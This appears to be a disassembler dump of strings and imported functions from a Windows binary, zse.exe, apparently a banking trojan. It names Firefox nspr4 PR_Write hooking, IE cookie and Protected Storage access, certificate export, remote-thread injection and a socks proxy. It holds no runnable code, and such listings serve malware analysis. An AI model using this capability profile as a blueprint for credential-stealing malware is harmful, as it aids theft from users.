.rdata:00416722 00000014 C SHRegDeleteUSValueA
.rdata:00416738 0000000F C SHDeleteValueW
.rdata:0041674A 0000000A C StrCSpnIA
.rdata:00416756 00000012 C PathCommonPrefixW
.rdata:0041676A 0000000E C PathIsPrefixW
.rdata:0041677A 00000010 C UrlIsNoHistoryW
.rdata:0041678C 0000000B C SHCopyKeyW
.rdata:00416592 00000012 C PathFindFileNameA
.rdata:004165A6 00000015 C SHIsLowMemoryMachine
.rdata:004165BE 0000000D C UrlUnescapeA
.rdata:004165CE 00000013 C SHRegDuplicateHKey
.rdata:004165E4 0000000D C SHDeleteKeyW
.rdata:004165F4 00000009 C StrStrIW
.rdata:00416600 00000011 C UrlCanonicalizeW
.rdata:00416B4E 0000000A C CopyFileA
.rdata:00416B5A 00000009 C lstrcpyn
.rdata:00416B66 0000000D C ReadConsoleW
.rdata:00416B76 0000000E C PeekNamedPipe
.rdata:00416B86 00000011 C CreateNamedPipeW
.rdata:00416B9A 00000013 C CreateDirectoryExA
.rdata:00416BB0 00000010 C SetThreadLocale
.rdata:00416BC2 0000000F C ClearCommBreak
.rdata:00416BD4 0000000D C SetStdHandle
.rdata:00416BE4 0000001F C GetNumberOfConsoleMouseButtons
.rdata:00416C06 00000015 C GetFileAttributesExW
.rdata:00416C1E 00000014 C WriteConsoleOutputW
.rdata:00416C34 00000010 C FlushViewOfFile
.rdata:00416C46 0000000B C PulseEvent
.rdata:00416C54 0000000D C GetLocalTime
.rdata:00416C64 00000015 C GetWindowsDirectoryA
.rdata:00416C7C 0000000E C SetCommConfig
.rdata:00416C8C 00000013 C GetFileAttributesW
.rdata:00416CA2 00000011 C GetConsoleTitleA
.rdata:00416CB6 00000017 C SetProcessAffinityMask
.rdata:00416CD0 0000000E C GetSystemInfo
.rdata:00416CE0 00000016 C FlushInstructionCache
.rdata:00416CF8 0000000F C SwitchToThread
.rdata:00416D0A 00000014 C GetCurrentProcessId
.rdata:00416D20 00000016 C DosDateTimeToFileTime
.rdata:00416D38 00000013 C EscapeCommFunction
.rdata:00416D4E 0000000C C HeapDestroy
.rdata:00416D5C 00000015 C SetCurrentDirectoryA
.rdata:00416D74 0000001B C GetConsoleScreenBufferInfo
.rdata:00416D92 0000000F C FindFirstFileA
.rdata:00416DA4 00000011 C CreateNamedPipeA
.rdata:00416DB8 00000010 C GetThreadLocale
.rdata:00416DCA 00000011 C GetTempFileNameA
.rdata:00416DDE 0000000D C GlobalUnWire
.rdata:00416DEE 0000000E C SwitchToFiber
.rdata:00416DFE 00000018 C LocalFileTimeToFileTime
.rdata:00416E18 00000014 C CreateTapePartition
.rdata:00416E2E 0000000F C GlobalAddAtomW
.rdata:00416E40 00000014 C WaitForSingleObject
.rdata:00416E56 0000000D C CreateMutexA
.rdata:00416E66 00000012 C GetShortPathNameW
.rdata:00416E7A 0000000C C FoldStringW
.rdata:00416E88 0000000F C CompareStringA
.rdata:00416E9A 00000009 C ReadFile
.rdata:00416EA6 00000019 C FreeLibraryAndExitThread
.rdata:00416EC2 00000010 C CompareFileTime
.rdata:00416ED4 00000019 C GetNamedPipeHandleStateA
.rdata:00416EF0 00000015 C GetUserDefaultLangID
.rdata:00416F08 00000016 C SetDefaultCommConfigA
.rdata:00416F20 00000011 C GetModuleHandleA
.rdata:00416F34 0000000E C GetSystemTime
.rdata:00416F44 00000016 C GetVolumeInformationW
.rdata:00416F5C 00000011 C GetLongPathNameA
.rdata:00416F70 0000000E C Process32Next
.rdata:00416F80 00000012 C SetFileApisToANSI
.rdata:00416F94 00000011 C FlushFileBuffers
.rdata:00416FA8 00000014 C GetSystemDirectoryW
.rdata:00416FBE 00000013 C GetCommModemStatus
.rdata:00416FD4 0000000B C GlobalSize
.rdata:00416FE2 00000013 C SetFileAttributesA
.rdata:00416FF8 00000012 C SetThreadPriority
.rdata:0041700C 00000009 C CancelIo
.rdata:00417018 00000012 C EnumCalendarInfoA
.rdata:0041679A 0000000D C SHDeleteKeyA
.rdata:004167AA 00000011 C SHRegSetUSValueW
.rdata:004167BE 00000014 C PathRelativePathToA
.rdata:004167D4 00000010 C PathMakePrettyW
.rdata:004167E6 0000000C C PathAppendA
.rdata:004167F4 00000010 C UrlIsNoHistoryA
.rdata:00416804 0000000C C SHLWAPI.dll
.rdata:00416812 00000014 C EnumCalendarInfoExA
.rdata:00416828 0000000D C Module32Next
.rdata:00416838 00000013 C EnumSystemLocalesW
.rdata:0041684E 0000000F C Heap32ListNext
.rdata:00416860 00000013 C GetUserDefaultLCID
.rdata:00416876 00000011 C EnumTimeFormatsA
.rdata:0041688A 0000000A C lstrcmpiA
.rdata:00416896 0000001A C GetQueuedCompletionStatus
.rdata:004168B2 0000000C C FreeLibrary
.rdata:004168C0 00000013 C EnumSystemLocalesA
.rdata:004168D6 0000000E C Thread32First
.rdata:004168E6 00000011 C GetNamedPipeInfo
.rdata:004168FA 0000000D C GlobalUnlock
.rdata:0041690A 00000018 C FreeEnvironmentStringsA
.rdata:00416924 0000000B C GlobalFree
.rdata:00416932 00000011 C GetCurrentThread
.rdata:00416946 00000012 C PeekConsoleInputA
.rdata:0041695A 00000010 C FindResourceExA
.rdata:0041696C 0000000F C VirtualProtect
.rdata:0041697E 0000000C C OpenProcess
.rdata:0041698C 00000017 C GetSystemDefaultLangID
.rdata:004169A6 00000017 C GetEnvironmentStringsA
.rdata:004169C0 0000000D C VirtualAlloc
.rdata:004169D0 00000009 C HeapLock
.rdata:004169DC 00000015 C ConvertDefaultLocale
.rdata:004169F4 00000010 C SetVolumeLabelW
.rdata:00416A06 0000000F C SizeofResource
.rdata:00416A18 00000011 C SetFileApisToOEM
.rdata:00416A2C 00000018 C FileTimeToLocalFileTime
.rdata:00416A46 00000011 C GetFullPathNameW
.rdata:00416A5A 00000012 C GetDiskFreeSpaceW
.rdata:00416A6E 0000000E C SetSystemTime
.rdata:00416A7E 00000013 C EnumDateFormatsExW
.rdata:00416A94 0000000F C CallNamedPipeA
.rdata:00416AA6 0000001C C FindCloseChangeNotification
.rdata:0041702C 00000008 C TlsFree
.rdata:00417036 00000018 C QueryPerformanceCounter
.rdata:00417050 00000015 C GetCurrentDirectoryW
.rdata:00417068 00000010 C WriteFileGather
.rdata:0041707A 00000011 C DefineDosDeviceW
.rdata:0041708E 00000016 C SetDefaultCommConfigW
.rdata:004170A6 00000014 C GetDevicePowerState
.rdata:004170BC 00000011 C SetPriorityClass
.rdata:004170D0 00000019 C GetPrivateProfileStringA
.rdata:004170EC 0000001E C GetNumberOfConsoleInputEvents
.rdata:0041710C 00000016 C ReadDirectoryChangesW
.rdata:00417124 00000013 C EndUpdateResourceA
.rdata:0041713A 00000011 C IsDBCSLeadByteEx
.rdata:0041714E 0000000B C OpenMutexA
.rdata:0041715C 00000017 C SetTimeZoneInformation
.rdata:00417176 00000008 C lstrlen
.rdata:00417180 0000000D C CreateThread
.rdata:00417190 00000013 C CreateRemoteThread
.rdata:004171A6 0000000F C CompareStringW
.rdata:004171B8 0000001D C SetProcessShutdownParameters
.rdata:004171D8 0000001C C Toolhelp32ReadProcessMemory
.rdata:004171F6 00000019 C GetPrivateProfileStructW
.rdata:00417212 00000010 C GetProcessHeaps
.rdata:00417224 0000000F C GetDateFormatW
.rdata:00417236 00000012 C SetTapeParameters
.rdata:0041724A 0000001D C SetConsoleActiveScreenBuffer
.rdata:0041726A 0000000B C OpenMutexW
.rdata:00417278 00000018 C IsSystemResumeAutomatic
.rdata:00417292 00000010 C SetTapePosition
.rdata:004172A4 0000000A C EraseTape
.rdata:004172B0 0000001B C PostQueuedCompletionStatus
.rdata:004172CE 0000000A C LocalFree
.rdata:004172DA 00000012 C GetThreadPriority
.rdata:004172EE 0000001C C FillConsoleOutputCharacterW
.rdata:0041730C 00000008 C lstrcmp
.rdata:00417316 00000016 C WaitForSingleObjectEx
.rdata:0041732E 00000011 C GetComputerNameW
.rdata:00417342 0000000F C GetThreadTimes
.rdata:00417354 00000012 C EnumCalendarInfoW
.rdata:00417368 0000000C C BackupWrite
.rdata:00417376 0000000E C SuspendThread
.rdata:00417384 0000000D C KERNEL32.dll
zse.exe The type of compiler used to build the program is vc6win Visual C++ v6.
F (dark blue) - regular function:
DialogFunc 004241D2 start 00424306 P
StartAddress 00424509
D (light green) Ŕ data:
hWnd 00429030
lpMem 00429034
hInstance 00429040
szDir 00429050
hHeap 0042A020
I (purple) - imported name:
00401000 CryptHashData ADVAPI32
00401004 CryptDestroyHash ADVAPI32
00401008 CryptCreateHash ADVAPI32 0040100C CryptGetHashParam ADVAPI32
00401010 CryptReleaseContext ADVAPI32
00401014 CryptAcquireContextW ADVAPI32 0040101C GetSaveFileNameW COMDLG32
00401020 GetOpenFileNameW COMDLG32
00401028 WriteFile KERNEL32 0040102C ReadFile KERNEL32
00401030 CreateFileW KERNEL32
00401034 OpenMutexW KERNEL32 00401038 SetNamedPipeHandleState KERNEL32
0040103C HeapReAlloc KERNEL32
00401040 MapViewOfFile KERNEL32 00401044 UnmapViewOfFile KERNEL32
00401048 FreeLibrary KERNEL32
0040104C HeapAlloc KERNEL32 00401050 HeapFree KERNEL32
00401054 GetTickCount KERNEL32
00401058 GetProcessHeap KERNEL32 0040105C WaitNamedPipeW KERNEL32
00401060 HeapDestroy KERNEL32
00401064 HeapCreate KERNEL32
00401068 MultiByteToWideChar KERNEL32 0040106C GetFileSizeEx KERNEL32
00401070 CreateFileMappingW KERNEL32
00401074 SetFileAttributesW KERNEL32 00401078 CreateThread KERNEL32
0040107C CloseHandle KERNEL32
00401080 Sleep KERNEL32 00401084 GetModuleHandleA KERNEL32
00401088 LoadLibraryA KERNEL32
0040108C GetProcAddress KERNEL32 00401090 GetModuleFileNameW KERNEL32
00401094 ExitProcess KERNEL32
00401098 lstrcmpiA KERNEL32 0040109C lstrcpyW KERNEL32
004010A0 WideCharToMultiByte KERNEL32
004010A4 DeleteFileW KERNEL32 004010AC ShellExecuteW SHELL32
004010B4 wvnsprintfW SHLWAPI
004010B8 wnsprintfW SHLWAPI 004010BC PathRemoveFileSpecW SHLWAPI
004010C0 PathFileExistsW SHLWAPI
004010C4 StrCmpNIA SHLWAPI
004010C8 PathFindFileNameA SHLWAPI 004010CC PathCombineW SHLWAPI
004010D4 GetWindowTextLengthW USER32
004010D8 MessageBoxW USER32 004010DC SetWindowTextW USER32
004010E0 DestroyWindow USER32
004010E4 LoadImageW USER32 004010E8 DialogBoxParamW USER32
004010EC EndDialog USER32
004010F0 ShowWindow USER32 004010F4 CreateDialogParamW USER32
004010F8 GetDlgItem USER32
004010FC SetWindowLongW USER32 00401100 GetDlgItemTextW USER32
00401104 EnableWindow USER32
00401108 SendMessageW USER32 0040110C SetDlgItemTextW USER32
00401114 OleInitialize ole32
A (dark green) - ascii string:
aThisProgramCan 0040429C
aMz 004042D0
aF 004046D0 aRoot 004046DC
aGrb 004046E8
a_txt 004046F0 aNspr4_dll 004046FC
aPr_write 00404708
aPopopo03333111 00404714 aPathS 0040472C
aSS 00404738
aCookie 00404740
aPostquitmessag 0041B080
aPostmessagew 0041B090
aPostmessagea 0041B0A0 aPeekmessagew_0 0041B0B0
aPeekmessagea 0041B0C0
aPaintdesktop 0041B0D0 aPackddelparam 0041B0E0
aOpenwindowst_0 0041B0F0
aOpenwindowst_1 0041B104 aOpeninputdeskt 0041B118
aOpenicon 0041B12C
aOpendesktopw 0041B138
aShregwriteusva 0041EBDC
aShregwriteus_0 0041EBF0
aShregsetusvalu 0041EC04 aShregsetusva_0 0041EC18
aShregqueryusva 0041EC2C
aShregqueryus_0 0041EC40 aShregqueryinfo 0041EC54
aShregqueryin_0 0041EC6C
aShregopenuskey 0041EC84 aShregopenusk_0 0041EC94
aShreggetusvalu 0041ECA4
aShreggetusva_0 0041ECB8
aIe_cookies 00404750
aPstorecreatein 00404768 aPstorec_dll 00404780
aStringdata 0040478C
aIeCookies 004047A4 aEmpty 004047B4
aProtectedStora 004047BC
aMacromediaFlas 004047EC a_sol 0040481C
aMfplayer_cfg_c 00404828
aTd 0040484C aTr 00404850
aHr 00404854
aBr 00404858 aTranslatemessa 00405278
aWsaconnect 0040528C
aConnect 00405298 aClosesocket 004052A0
aSend 004052AC
aHttpqueryinfow 004052B4
aHttpqueryinfoa 004052C4
aInternetcloseh 004052D4
aInternetqueryd 004052E8 aInternetreadfi 00405304
aInternetread_0 00405318
aInternetread_1 0040532C aHttpsendreques 00405340
aHttpsendrequ_0 00405354
aHttpsendrequ_1 00405368 aHttpsendrequ_2 0040537C
aNtquerydirecto 00405390
aLdrgetprocedur 004053A8 aLdrloaddll 004053C0
aNtcreatethread 004053CC
aRsldps 004053DC a09ck_Ldfuihpfr 004053EC
a3709128dk00234 00405400
aMy 00405414 a009023434 0040541C
aStartPage 00405430
aSoftwareMicros 0040543C a23324mM434dkkl 00405468
a3208_09303333 0040547C
aUnknown 00405494 aGet 004054A8
aPost 004054B0
aHttp1_ 004054B8 aHost 004054C0
aPr_getpeername 004054C8
aReferer 004054D8 aContentType 004054E0
aPr_getnamefori 004054F0 aNssLayer 00405508
aHttps 00405514
aHttp 00405520 aU_U_U_U 00405528
aU 00405534
aGet_0 00405538
aPost_0 0040553C
aGetprocaddress 00405544
aLoadlibrarya 00405554 a09283940745957 00405564
a809dslffsdfsdf 00405578
aMKeolkp90344 0040558C aOk 004055A0
aUnknownCommand 004055A4
aSyntaxErrorAtL 004055C0 aScriptAlreadyE 004055DC
aInternalComman 004055F8
aSoftwareMicr_0 00405620
aOpendesktopa_0 0041B148
aOpenclipboard 0041B158 aOffsetrect 0041B168
aOemtocharw 0041B174
aOemtocharbuffw 0041B180 aOemtocharbuffa 0041B190
aOemtochara 0041B1A0
aOemkeyscan 0041B1AC aNotifywinevent 0041B1B8
aMsgwaitformu_0 0041B1C8
aMsgwaitformu_1 0041B1E4 aMovewindow 0041B200
aMonitorfromwin 0041B20C
aMonitorfromrec 0041B220 aMonitorfrompoi 0041B230
aModifymenuw 0041B244
aModifymenua 0041B250 aMessageboxw 0041B25C
aMessageboxindi 0041B268
aMessageboxin_0 0041B27C
aMessageboxexw 0041B290
aMessageboxexa 0041B2A0
aMessageboxa 0041B2B0 aMessagebeep 0041B2BC
aMenuitemfrompo 0041B2C8
aMapwindowpoint 0041B2DC aMapvirtualkeyw 0041B2EC
aMapvirtualkeye 0041B2FC
aMapvirtualke_0 0041B310 aMapvirtualkeya 0041B324
aMapdialogrect 0041B334
aLookupiconidfr 0041B344 aLookupiconid_0 0041B360
aLockwindowupda 0041B37C
aLoadstringw 0041B390 aLoadstringa 0041B39C
aLoadmenuw 0041B3A8
aLoadmenuindire 0041B3B4 aLoadmenuindi_0 0041B3C8
aLoadmenua 0041B3DC
aLoadkeyboardla 0041B3E8 aLoadkeyboard_0 0041B3FC
aLoadimagew 0041B410
aLoadimagea 0041B41C aLoadiconw 0041B428
aLoadicona 0041B434
aLoadcursorw_0 0041B440 aLoadcursorfr_0 0041B44C
aLoadcursorfrom 0041B460
aLoadcursora 0041B474 aLoadbitmapw 0041B480
aLoadbitmapa 0041B48C aLoadaccelerato 0041B498
aLoadaccelera_0 0041B4AC
aKilltimer 0041B4C0 aIszoomed 0041B4CC
aIswindowvisibl 0041B4D8
aIswindowunicod 0041B4E8
aIswindowenable 0041B4F8
aIswindow 0041B508
aIsrectempty 0041B514 aIsmenu 0041B520
aIsiconic 0041B528
aIsdlgbuttonche 0041B534 aIsdialogmessag 0041B548
aIsdialogmess_0 0041B55C
aIsdialogmess_1 0041B570 aIsclipboardfor 0041B580
aIschild 0041B59C
aIscharupperw 0041B5A4
aShreggetboolus 0041ECCC
aShreggetbool_0 0041ECE4 aShregenumusval 0041ECFC
aShregenumusv_0 0041ED10
aShregenumuskey 0041ED24 aShregenumusk_0 0041ED34
aShregduplicate 0041ED44
aShregdeleteusv 0041ED58 aShregdeleteu_0 0041ED6C
aShregdeleteemp 0041ED80
aShregdeletee_0 0041ED98 aShregcreateusk 0041EDB0
aShregcreateu_0 0041EDC4
aShregcloseuske 0041EDD8 aShqueryvalueex 0041EDE8
aShqueryvalue_0 0041EDF8
aShqueryinfokey 0041EE08 aShqueryinfok_0 0041EE18
aShopenregstrea 0041EE28
aShopenregstr_0 0041EE3C
aShopenregstr_1 0041EE50
aShopenregstr_2 0041EE64
aShislowmemorym 0041EE78 aShgetvaluew 0041EE90
aShgetvaluea 0041EE9C
aShgetthreadref 0041EEA8 aShgetinversecm 0041EEB8
aShenumvaluew 0041EECC
aShenumvaluea 0041EEDC aShenumkeyexw 0041EEEC
aShenumkeyexa 0041EEFC
aShdeletevaluew 0041EF0C aShdeletevaluea 0041EF1C
aShdeletekeyw 0041EF2C
aShdeletekeya_0 0041EF3C aShdeleteemptyk 0041EF4C
aShdeleteempt_0 0041EF60
aShcreatestream 0041EF74 aShcreatestre_0 0041EF8C
aShcreateshellp 0041EFA4
aShcopykeyw 0041EFBC aShcopykeya 0041EFC8
aShautocomplete 0041EFD4
aPathunquotespa 0041EFE4 aPathunquotes_0 0041EFF8
aPathunmakesyst 0041F00C
aPathunmakesy_0 0041F024 aPathundecorate 0041F03C
aPathundecora_0 0041F04C
aPathstriptoroo 0041F05C aPathstriptor_0 0041F070
aPathstrippathw 0041F084 aPathstrippatha 0041F094
aPathskiproot_0 0041F0A4
aPathskiproota 0041F0B4 aPathsetdlgitem 0041F0C4
aPathsetdlgit_0 0041F0D8
aPathsearchandq 0041F0EC
aPathsearchan_0 0041F104
aPathrenameexte 0041F11C
aPathrenameex_0 0041F134 aPathremovefi_0 0041F14C
aPathremovefi_1 0041F160
aPathremoveexte 0041F174 aPathremoveex_0 0041F18C
aPathremoveblan 0041F1A4
aPathremovebl_0 0041F1B8 aPathremoveba_0 0041F1CC
aPathremoveba_1 0041F1E4
aPathremoveargs 0041F1FC
a_def 00405688
aSocks 00405694 a213kjhndkmnihj 0040569C
aSSS 004056B0
aGetusernameexw 004056BC aPfxexportcerts 004056CC
aCertduplicatec 004056E0
aRtdeletecertif 00405702 aCertenumsystem 00405720
aErtenumcertifi 00405735
aCertclosestore 00405750 aCertopensystem 00405760
aClsidfromstrin 00405778
aStringfromguid 00405788 aCocreateinstan 00405798
aGetwindowtextw 004057AC
aGetclassnamew 004057BC aGetwindowlongw 004057CC
aSendmessagew 004057DC
aFindwindowexw 004057EC
aGetdlgitemtext 004057FC
aGetdlgitemte_0 0040580C
aGetdlgitem 0040581C aGeticoninfo 00405828
aDrawicon 00405834
aGetcursorpos 00405840 aLoadcursorw 00405850
aSetthreaddeskt 0040585C
aClosedesktop 00405870 aOpendesktopa 00405880
aSetprocesswind 00405890
aClosewindowsta 004058A8 aOpenwindowstat 004058BC
aGetforegroundw 004058D0
aGetwindowthrea 004058E4 aDispatchmessag 00405900
aMsgwaitformult 00405914
aGetkeyboardsta 00405930 aTounicode 00405944
aGetkeystate 00405950
aDispatchmess_0 0040595C aPeekmessagew 00405970
aCharlowerbuffa 00405980
aExitwindowsex 00405990 aChartooemw 004059A0
aCharupperw 004059AC
aWsagetlasterro 004059B8 aWsasetlasterro 004059C8
aSelect 004059D8
aWsaioctl 004059E0 aRecv 004059EC
aRecvfrom 004059F4 aGetsockname 00405A00
aFreeaddrinfo 00405A0C
aGetaddrinfo 00405A1C aShutdown 00405A28
aWsacleanup 00405A34
aWsastartup 00405A40
aAccept 00405A4C
aListen 00405A54
aBind 00405A5C aSocket 00405A64
aGetpeername 00405A6C
aSendto 00405A78 aWsasendto 00405A80
aWsasend 00405A8C
aCryptreleaseco 00405A94 aCryptdestroyha 00405AA8
aCryptgethashpa 00405ABC
aCrypthashdata 00405AD0
aIscharuppera 0041B5B4
aIscharlowerw 0041B5C4 aIscharlowera 0041B5D4
aIscharalphaw 0041B5E4
aIscharalphanum 0041B5F4 aIscharalphan_0 0041B608
aIscharalphaa 0041B61C
aInvertrect 0041B62C aInvalidatergn 0041B638
aInvalidaterect 0041B648
aIntersectrect 0041B658 aInternalgetwin 0041B668
aInsertmenuw 0041B680
aInsertmenuitem 0041B68C aInsertmenuit_0 0041B69C
aInsertmenua 0041B6AC
aInflaterect 0041B6B8 aInsendmessagee 0041B6C4
aInsendmessage 0041B6D4
aImpersonatedde 0041B6E4
aHilitemenuitem 0041B700
aHidecaret 0041B710
aGraystringw 0041B71C aGraystringa 0041B728
aGetwindowword 0041B734
aGetwindowthr_0 0041B744 aGetwindowtex_0 0041B760
aGetwindowtextl 0041B770
aGetwindowtex_1 0041B788 aGetwindowtexta 0041B7A0
aGetwindowrgn 0041B7B0
aGetwindowrect 0041B7C0 aGetwindowplace 0041B7D0
aGetwindowmodul 0041B7E4
aGetwindowmod_0 0041B800 aGetwindowlon_0 0041B81C
aGetwindowlonga 0041B82C
aGetwindowinfo 0041B83C aGetwindowdc 0041B84C
aGetwindowconte 0041B858
aGetwindow 0041B870 aGetuserobjects 0041B87C
aGetuserobjecti 0041B894
aGetuserobjec_0 0041B8B0 aGetupdatergn 0041B8CC
aGetupdaterect 0041B8DC
aGettopwindow 0041B8EC aGettitlebarinf 0041B8FC
aGetthreaddeskt 0041B90C
aGettabbedtexte 0041B920 aGettabbedtex_0 0041B938
aGetsystemmetri 0041B950 aGetsystemmenu 0041B964
aGetsyscolorbru 0041B974
aGetsyscolor 0041B988 aGetsubmenu 0041B994
aGetshellwindow 0041B9A0
aGetscrollrange 0041B9B0
aGetscrollpos 0041B9C0
aGetscrollinfo 0041B9D0
aGetscrollbarin 0041B9E0 aGetqueuestatus 0041B9F4
aGetpropw 0041BA04
aGetpropa 0041BA10 aGetprocesswind 0041BA1C
aGetprocessdefa 0041BA34
aGetprioritycli 0041BA4C aGetparent 0041BA68
aGetopenclipboa 0041BA74
aGetnextdlgtabi 0041BA8C
aPathremovear_0 0041F20C
aPathrelativepa 0041F21C aPathrelative_0 0041F230
aPathquotespace 0041F244
aPathquotespa_0 0041F258 aPathparseiconl 0041F26C
aPathparseico_0 0041F284
aPathmatchspe_0 0041F29C aPathmatchspeca 0041F2AC
aPathmakesystem 0041F2BC
aPathmakesyst_0 0041F2D4 aPathmakepretty 0041F2EC
aPathmakepret_0 0041F2FC
aPathisurlw 0041F30C aPathisurla 0041F318
aPathisuncw 0041F324
aPathisuncserve 0041F330 aPathisuncser_0 0041F344
aPathisuncser_1 0041F35C
aPathisuncser_2 0041F374
aPathisunca 0041F388
aPathissystemfo 0041F394
aPathissystem_0 0041F3A8 aPathissameroot 0041F3BC
aPathissamero_0 0041F3CC
aPathisrootw 0041F3DC aPathisroota 0041F3E8
aPathisrelative 0041F3F4
aPathisrelati_0 0041F404 aPathisprefixw 0041F414
aPathisprefixa 0041F424
aPathisnetworkp 0041F434 aPathisnetwor_0 0041F448
aPathislfnfiles 0041F45C
aPathislfnfil_0 0041F470 aPathisfilespec 0041F484
aPathisfilesp_0 0041F494
aPathisdirector 0041F4A4 aPathisdirect_0 0041F4B8
aPathisdirect_1 0041F4D0
aPathisdirect_2 0041F4E8 aPathiscontentt 0041F4FC
aPathisconten_0 0041F510
aPathgetdrivenu 0041F524 aPathgetdrive_0 0041F538
aPathgetchartyp 0041F54C
aPathgetchart_0 0041F560 aPathgetargsw 0041F574
aPathgetargsa 0041F584
aPathfindsuffix 0041F594 aPathfindsuff_0 0041F5AC
aPathfindonpath 0041F5C4 aPathfindonpa_0 0041F5D4
aPathfindnextco 0041F5E4
aPathfindnext_0 0041F5FC aPathfindfile_0 0041F614
aPathfindfile_1 0041F628
aPathfindextens 0041F63C
aPathfindexte_0 0041F650
aPathfileexis_0 0041F664
aPathfileexis_1 0041F674 aPathcreatefrom 0041F684
aPathcreatefr_0 0041F698
aPathcompactpat 0041F6AC aPathcompactp_0 0041F6C0
aPathcompactp_1 0041F6D4
aPathcompactp_2 0041F6E8 aPathcommonpref 0041F6FC
aPathcommonpr_0 0041F710
aPathcombinew_0 0041F724
aCryptcreatehas 00405AE0
aCryptacquireco 00405AF0 aDuplicatetoken 00405B08
aCreateprocessa 00405B1C
aSetsecuritydes 00405B34 aInitializesecu 00405B50
aRegenumkeyexw 00405B70
aRegdeletevalue 00405B80 aRegsetvalueexa 00405B90
aRegsetvalueexw 00405BA0
aRegclosekey 00405BB0 aRegopenkeyexw 00405BBC
aRegcreatekeyex 00405BCC
aRegcreatekey_0 00405BDC aRegqueryvaluee 00405BEC
aLookupaccounts 00405C00
aGettokeninform 00405C14 aOpenprocesstok 00405C28
aAdjusttokenpri 00405C3C
aLookupprivileg 00405C54
aGetusernamew 00405C6C
aDeleteurlcache 00405C7C
aFindcloseurlca 00405C94 aFindnexturlcac 00405CA8
aFindfirsturlca 00405CC0
aInternetsetopt 00405CD8 aInternetsetsta 00405CEC
aGeturlcacheent 00405D08
aHttpaddrequest 00405D20 aHttpaddreque_0 00405D38
aInternetqueryo 00405D50
aInternetcheckc 00405D68 aInternetcracku 00405D84
aHttpopenreques 00405D98
aInternetconnec 00405DAC aInternetopenur 00405DC0
aInternetopena 00405DD4
aInternetgetcoo 00405DE4 aGetmodulefilen 00405DF8
aShdeletekeya 00405E10
aPathmatchspecw 00405E20 aPathremovefile 00405E30
aPathfileexists 00405E44
aPathskiprootw 00405E54 aPathremoveback 00405E64
aPathaddextensi 00405E7C
aPathaddbacksla 00405E90 aPathfindfilena 00405EA4
aPathcombinew 00405EB8
aWnsprintfa 00405EC8 aWnsprintfw 00405ED4
aWvnsprintfa 00405EE0 aWvnsprintfw 00405EEC
aStrcmpniw 00405EF8
aStrcmpnia 00405F04 aStrstria 00405F10
aStrstrw 00405F1C
aRtlcreateusert 00405F24
aLdrgetdllhandl 00405F38
aNtqueryinforma 00405F48
aNtcreatefile 00405F64 aNtqueryobject 00405F74
aShellexecutew 00405F84
aShgetfolderpat 00405F94 aShgetspecialfo 00405FA8
aFindresourcew 00405FC0
aExpandenvironm 00405FD0 aGlobalunlock 00405FEC
aGloballock 00405FFC
aGetfiletime 00406008
aGetnextdlggrou 0041BAA0
aGetmonitorinfo 0041BAB4 aGetmonitorin_0 0041BAC4
aGetmessagew 0041BAD4
aGetmessagetime 0041BAE0 aGetmessagepos 0041BAF0
aGetmessageextr 0041BB00
aGetmessagea 0041BB14 aGetmenustringw 0041BB20
aGetmenustringa 0041BB30
aGetmenustate 0041BB40 aGetmenuitemrec 0041BB50
aGetmenuiteminf 0041BB60
aGetmenuitemi_0 0041BB74 aGetmenuitemid 0041BB88
aGetmenuitemcou 0041BB98
aGetmenuinfo 0041BBAC aGetmenudefault 0041BBB8
aGetmenucontext 0041BBCC
aGetmenucheckma 0041BBE4
aGetmenubarinfo 0041BC00
aGetmenu 0041BC10
aGetlistboxinfo 0041BC18 aGetlastactivep 0041BC28
aGetkeyboardtyp 0041BC3C
aGetkeyboards_0 0041BC4C aGetkeyboardlay 0041BC60
aGetkeyboardl_0 0041BC78
aGetkeyboardl_1 0041BC90 aGetkeyboardl_2 0041BCA8
aGetkeystate_0 0041BCBC
aGetkeynametext 0041BCC8 aGetkeynamete_0 0041BCD8
aGetkbcodepage 0041BCE8
aGetinputstate 0041BCF8 aGetinputdeskto 0041BD08
aGeticoninfo_0 0041BD18
aGetguiresource 0041BD24 aGetguithreadin 0041BD34
aGetforegroun_0 0041BD48
aGetfocus 0041BD5C aGetdoubleclick 0041BD68
aGetdlgitemte_1 0041BD7C
aGetdlgitemte_2 0041BD8C aGetdlgitemint 0041BD9C
aGetdlgitem_0 0041BDAC
aGetdlgctrlid 0041BDB8 aGetdialogbaseu 0041BDC8
aGetdesktopwind 0041BDDC
aGetdcex 0041BDF0 aGetdc 0041BDF8
aGetcursorpos_0 0041BE00 aGetcursorinfo 0041BE10
aGetcursor 0041BE20
aGetcomboboxinf 0041BE2C aGetclipboardvi 0041BE3C
aGetclipboardse 0041BE50
aGetclipboardow 0041BE6C
aGetclipboardfo 0041BE80
aGetclipboard_0 0041BE98
aGetclipboardda 0041BEB0 aGetclipcursor 0041BEC4
aGetclientrect 0041BED4
aGetclassword 0041BEE4 aGetclassname_0 0041BEF4
aGetclassnamea 0041BF04
aGetclasslongw 0041BF14 aGetclasslonga 0041BF24
aGetclassinfow 0041BF34
aGetclassinfoex 0041BF44
aPathcombinea 0041F734
aPathcanonicali 0041F744 aPathcanonica_0 0041F758
aPathbuildrootw 0041F76C
aPathbuildroota 0041F77C aPathappendw 0041F78C
aPathappenda 0041F798
aPathaddexten_0 0041F7A4 aPathaddexten_1 0041F7B8
aPathaddbacks_0 0041F7CC
aPathaddbacks_1 0041F7E0 aIntlstreqworke 0041F7F4
aIntlstreqwor_0 0041F808
aHashdata 0041F81C aGetmenuposfrom 0041F828
aColorrgbtohls 0041F83C
aColorhlstorgb 0041F84C aColoradjustlum 0041F85C
aChrcmpiw 0041F86C
aChrcmpia 0041F878
aAssocquerystri 0041F884
aAssocqueryst_0 0041F898
aAssocqueryst_1 0041F8B0 aAssocqueryst_2 0041F8C8
aAssocquerykeyw 0041F8DC
aAssocquerykeya 0041F8EC aLstrlenw 0041F8FC
aLstrlena 0041F908
aLstrlen 0041F914 aLstrcpynw_0 0041F91C
aLstrcpyna_0 0041F928
aLstrcpyn 0041F934 aLstrcpyw_0 0041F940
aLstrcpya_0 0041F94C
aLstrcpy 0041F958 aLstrcmpiw_0 0041F960
aLstrcmpia_0 0041F96C
aLstrcmpi 0041F978 aLstrcmpw 0041F984
aLstrcmpa 0041F990
aLstrcmp 0041F99C aLstrcatw_0 0041F9A4
aLstrcata_0 0041F9B0
aLstrcat 0041F9BC aWritetapemark 0041F9C4
aWriteprofilest 0041F9D4
aWriteprofile_0 0041F9E8 aWriteprofilese 0041F9FC
aWriteprofile_1 0041FA14
aWriteprocess_0 0041FA2C aWriteprivatepr 0041FA40
aWriteprivate_0 0041FA5C aWriteprivate_1 0041FA78
